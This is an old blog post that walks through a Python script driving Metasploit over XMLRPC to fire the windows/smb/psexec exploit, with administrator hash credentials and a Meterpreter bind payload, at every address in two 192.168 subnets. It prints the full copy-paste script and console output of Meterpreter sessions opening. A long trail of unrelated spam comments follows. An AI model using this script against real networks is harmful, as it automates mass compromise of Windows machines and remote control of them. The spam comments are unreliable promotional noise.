Python and libxmlrpc make an easy way to accomplish this task. To start with, we need to start Metasploit up on our host system and start the xmlrpc module
After we have XMLRPC loaded, then we can get down to some python programming.
sussurro@msfdev:~/metasploit$ ./msfconsole
# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #
=[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 305 exploits - 67 auxiliary
+ -- --=[ 171 payloads - 20 encoders - 6 nops
=[ svn r7908 updated today (2009.12.17)
msf > load xmlrpc Pass=abc123 ServerType=Web
[*] XMLRPC Service: 127.0.0.1:55553
[*] XMLRPC Username: msf
[*] XMLRPC Password: abc123
[*] XMLRPC Server Type: Web
[*] XMLRPC Web URI: /RPC2
[*] Successfully loaded plugin: xmlrpc
msf >
The assumption is, much like with Jabra's program, that we are going to be scanning 2 networks, the 192.168.1.X and the 2.X networks. The first thing we need to do is get authenticated into Metasploit.
user = "msf"
password = "abc123"
token = ""
msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")
auth = msf.auth.login(user,password)
if auth["result"] == "success" :
token = auth["token"]
else:
exit("Login failed, try again\n")
We setup our username, msf, and our super secret password of abc123 first, and then we use the xmlrpclib library to connect to our Metasploit server. Once we are connected, the msf object holds our connection information.
When we are connected, the first thing we need to do is authenticate so that we get an authentication token. The authentication token is required for all future actions unless your session goes idle. We authenticate with the "auth.login" method and the object we get back contains our token.
Next we need to call our actual exploit, to do this we create a small function to make the calls a little bit more clear.
def callSploit(ip):
ret = msf.module.execute(token,"exploit","windows/smb/psexec",
{
"RHOST" : ip,
"PAYLOAD" : "windows/meterpreter/bind_tcp",
"SMBUser" : "Administrator",
"SMBPass" : "LM:NTLM HASH" })
if ret["result"] != "success" :
print "Exploit failed for " + ip + "\n"
We have defined a function called callSploit which takes an IP address. We are asking our Metasploit connection to launch the module.execute function, specifying our authentication token, the type of module we are calling (exploit) and the module itself that we will be using. The final argument is all of the arguments that we would traditionally pass inside the Metasploit console. Once we launch the exploit, we get back a result object, and a result of success means that the request was valid. While the requests are launching, we can see the sessions popping up in the Metasploit console and can interact with them one at a time.
The next stage in our program is to do the actual call of our new function:
for net in range(1,2):Here we have just went through the 192.168.1 and .2 range and the list of IP addresses valid for each submit and executed our callSploit function. The jobs will be running quickly, however if you look inside msfconsole and type in "jobs" repeatedly you should see
for ip in range(1,254):
callSploit("192.168." + str(net) +"."+ str(ip))
time.sleep(1)
print "DONE.. check for shells"
msf > jobs
Jobs
====
Id Name
-- ----
2 Exploit: windows/smb/psexec
Finally, once you have a host that works you will hopefully see
[*] Meterpreter session 4 opened (192.168.1.5:36435 -> 192.168.1.44:4444)
[*] Meterpreter session 5 opened (192.168.1.5:43357 -> 192.168.1.130:4444)
[*] Meterpreter session 6 opened (192.168.1.5:48619 -> 192.168.2.3:4444)
To get Metasploit, go over to http://www.metasploit.com
Jabra's blog is a great read: http://spl0it.wordpress.com
Here is the script in easier copy and paste form:
#!/usr/bin/python
import xmlrpclib
import time
user = "msf"
password = "abc123"
token = ""
msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")
auth = msf.auth.login(user,password)
if auth["result"] == "success" :
token = auth["token"]
else:
exit("Login failed, try again\n")
def callSploit(ip):
ret = msf.module.execute(token,"exploit","windows/smb/psexec",
{
"RHOST" : ip,
"PAYLOAD" : "windows/meterpreter/bind_tcp",
"SMBUser" : "Administrator",
"SMBPass" : "LM:NTLM HASH" })
if ret["result"] != "success" :
print "Exploit failed for " + ip + "\n"
for net in range(1,2):
for ip in range(1,254):
callSploit("192.168." + str(net) +"."+ str(ip))
time.sleep(1)
print "DONE.. check for shells"
19 comments:
Nice post, I've to do some minimal modifications to test it with another exploit (ms08_67_netapi), and the indentation that python needs, but it worked like a charm, I'm trying to do the same thing with perl, if I have some news on this I'll back to let you know. thanks for sharing ^^
Here is the perl version of your script it was very helpful to me, http://pastebin.com/fPkZhRNm
I'm interested on Nsploit but I cannot get the script working, maybe I'm doing something wrong, I don't see any error on nmap...
Scriptwriting and software programming is not my cup of tea, but one of my genius friends is studying programming. And he often faces problems in scriptwriting, so this post will surely help in learning something new. As he also found help in thesis writing for me when I was struggling to write a thesis, and now it’s my turn to help him back.
modifications and the indentation that python needs, to test it with another exploit According to a survey, about 78 per cent of students in the United Kingdom are doing side jobs in order to manage their daily living expenses and tuition fee.
Dissertation Writing Services
PSExec scanner helps me in my work as much as students get help with Buy Essay Online in their writing projects. you wrote an outstanding post that will help me to improve my work.
We have carefully drawn our pricing plan, bearing in mind, the affordability of our target audience, which are mostly students. Thus availing our cheapest essay writing service usae USA based is never a burden for anyone as it is carefully drafted over student’s affordability.
Digital Marketing Market gives an in-depth analysis of the Indian digital marketing market, assessing the market based on its segments like end-user industries and digital channels. The report tracks the latest trends in the industry and studies their impact on the overall market. It also assesses the market dynamics, covering the key demand and price indicators, along with analysing the market based on the SWOT and Porter’s Five Forces models. In the historical period 2016-2020, the digital marketing market saw considerable progress due to a considerable boom in the demand for smart devices, especially smartphones. There is also a considerably large young population, which has also led to a considerable shift towards newer technologies being adopted.
I am always searching online for articles that can help me. There is obviously a lot to know about this. I think you made some good points in Features also. Keep working, great job ! Feel free to visit my website; 토토사이트
Hi there
Very nice post and blog, keep sharing the best content with us, hope to read more interesting articles like this one around here
take care and regards
Your follower
Salvatore from Visite as Cataratas do Iguaçu e se Encante com uma das 7 Maravilhas da Natureza.
.
.
.
.
post free ads in uae games
check out the amazing Pizza deals at 14 street pizza deals Karachi
I am grateful to you for providing such a thorough and analytical perspective; the written material is the reason why I read it carefully.
bar soap packaging wholesale.
We would like to express our gratitude for the post that you have offered; it has given us a fantastic idea.
CBD packing boxes
I recently used the dog boarding KC and couldn't be happier. The facility was clean and well-maintained, and the staff was attentive and caring towards my furry friend. I felt at ease knowing my dog was in good hands while I was away. Highly recommended!
"What is good conclusion of an essay?" is a common question among students seeking to create impactful and memorable endings to their written works. A good conclusion of an essay serves as a final opportunity to leave a lasting impression on the reader. It should effectively summarize the main points and arguments presented in the essay while reinforcing the thesis statement. A strong conclusion also goes beyond mere repetition and offers a sense of closure by providing a broader perspective on the topic or leaving the reader with a thought-provoking statement.
PSEXEC scanner is very fast but I don't have time to breifly define the product because in those specific day's I am busy for my cousin plastic surgery where I am make it from Dubai cosmetic surgery clinic because it's really cheap by the way.
Discover the magic of printable coloring pages! Offering a myriad of designs suitable for all ages, they inspire creativity and provide a peaceful retreat. Immerse yourself in a world of vibrant colors and artistic expression. An essential resource for unleashing imagination!
In addition to practical skills, the course also provides valuable knowledge on pool regulations and best practices for maintaining a safe and enjoyable swimming environment. Upon successful completion of the training program, participants will be awarded a certification that is recognized nationally, opening up opportunities for employment at pools, beaches, and other aquatic facilities.
The pool lifeguard training course Broome is led by experienced instructors who are dedicated to equipping individuals with the necessary tools to ensure the safety of swimmers and create a positive recreational experience for all.
Los juegos casinos online ofrecen una experiencia de entretenimiento sin igual, con una amplia variedad de opciones como tragamonedas, blackjack, ruleta y más. Estos juegos te permiten disfrutar de la emoción de un casino desde la comodidad de tu hogar, con la posibilidad de ganar dinero real.
Post a Comment